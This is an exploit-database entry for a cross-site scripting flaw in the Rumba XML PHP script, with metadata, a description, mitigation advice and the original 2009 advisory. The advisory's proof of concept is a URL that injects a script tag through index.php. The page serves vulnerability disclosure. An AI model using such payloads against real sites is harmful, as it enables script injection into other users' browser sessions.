header-logo
Suggest Exploit
vendor:
Rumba XML
by:
Hadi Kiamarsi
3.1
CVSS
MEDIUM
XSS vulnerability
79
CWE
Product Name: Rumba XML
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Rumba XML (All Version)

A cross-site scripting (XSS) vulnerability exists in Rumba XML, all versions, which could allow an attacker to inject arbitrary web script or HTML. The vulnerability is due to insufficient sanitization of user-supplied input in the 'index.php' script. An attacker can exploit this vulnerability by enticing an authenticated user to click a malicious link. Successful exploitation could result in arbitrary web script or HTML execution in the user's browser session in the context of the affected application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web pages. Additionally, the application should use a web application firewall to help protect against XSS attacks.
Source

Exploit-DB raw data:

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#

###########################################

PoC :

http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>

example :

http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>